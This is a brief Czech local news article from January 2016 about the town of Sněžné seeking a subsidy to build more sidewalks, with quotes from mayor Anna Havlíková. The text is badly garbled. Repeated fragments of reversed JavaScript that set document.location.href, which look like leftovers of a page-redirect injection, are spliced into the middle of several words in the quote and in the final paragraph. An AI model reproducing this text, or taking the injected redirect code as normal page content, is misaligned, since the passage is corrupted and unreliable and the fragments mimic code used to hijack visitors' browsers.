Rainbow page separator

Sněžné chce získat dotaci na další chodníky

Neděle, 10. ledna 2016

Sněžné

Sněžné / Žádost o dotaci na vybudování další části chodníků plánují podat ve Sněžném. Jedná se o úsek od náměstí směrem ke zdravotnímu středisku až na konec městyse.
„Pokud budeme se svojí žádostí o dotační příspěvek úspěšní, tak bychom le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vybudovali ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úsek. Žádost na poslední úsek, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to znamená na dolní část Sněžného, bychom rádi podali následně, v ideálním případě s realizací v roce 2017,“ informovala starostka Sněžného Anna Havlíková.
O dotaci na chodníky ve Sněžném nebylo možné požádat naráz, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože přerušení chodníků může být podle dotačních požadavků maximálně deset metrů, což kvůli náměstí nebylo možné dodržet. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to došlo k rozdělení prací na etapy. Městys Sněžné musel dopracovat projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci i na propojení, aby v následující výzvě mohl požádat o finance na další část.